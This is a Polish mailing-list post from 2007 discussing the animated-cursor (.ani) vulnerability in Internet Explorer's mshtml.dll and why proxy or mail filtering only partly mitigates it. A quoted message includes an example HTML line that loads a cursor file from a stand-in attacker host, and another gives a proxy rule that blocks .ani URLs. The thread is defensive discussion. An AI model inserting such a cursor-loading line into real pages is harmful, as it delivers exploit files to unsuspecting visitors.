** sTav wrote:
>> Konkretnie to luka dotyczy silnika mshtml.dll i tego w jaki sposób
>> MS dodał idiotyczne niestandardowe rozszerzenia do CSS. Typu np.:
>> <body style="cursor:url('http://www.hack.com/cursor.ani')">
>> I MSIE to rozkosznie załaduje +błąd w obsłudze kursora i gotowe...
>> Więc wyłączając obsługę *.ani w powłoce niczego jednak nie
>> osiągniemy. :\
>> Rozwiązaniem w takim razie jest nie używać mshtml.dll co jest sprawą
>> nieco problematyczną z uwagi na to, że w ogóle wiele programów z
>> tego korzysta, często możemy o tym nie wiedzieć. :\
> IMO: Wystarczy zablokować skryptem w proxyautoconfig: shExpMatch(url,
> "*.ani")
No właśnie ciężko powiedzieć. MSIE może też starać się wykryć plik po
typie MIME zapodanym przez serwer, wtedy Twoja regułka nic nie da bo
URL pliku może być i http://www.hack.com/cursor.dupa... No ale nie
wiem, nie jest to ani udokumentowane, ani nie ma kodu źródłowego aby
sobie sprawdzić.
Lepszym rozwiązaniem (ale też nieskutecznym - czytaj dalej) byłoby
filtrowanie na proxy wszystkich reguł CSS "cursor:". *Ale* to nadal
tylko próba obejścia - bo co w momencie kiedy to przyjdzie pocztą?
Dodać filtrowanie poczty? Co w momencie kiedy to przyjdzie pocztą po
SSL? Filtrować pocztę po SSL? Co w momencie kiedy to przyjdzie
programem, który używa mshtml.dll, ale się tego zupełnie nie
spodziewasz, że to robi?
W sensie są to jedynie działania w rodzaju nakładania plastra, a nie
usunięcia u podstaw samej luki, która to powoduje. :\
--
+ ' .-. .
, * ) )
http://kosmosik.net/ . . '-' . kK
Received on Sat Mar 31 01:15:06 2007
To archiwum zostało wygenerowane przez hypermail 2.1.8 : Sat 31 Mar 2007 - 01:42:06 MET DST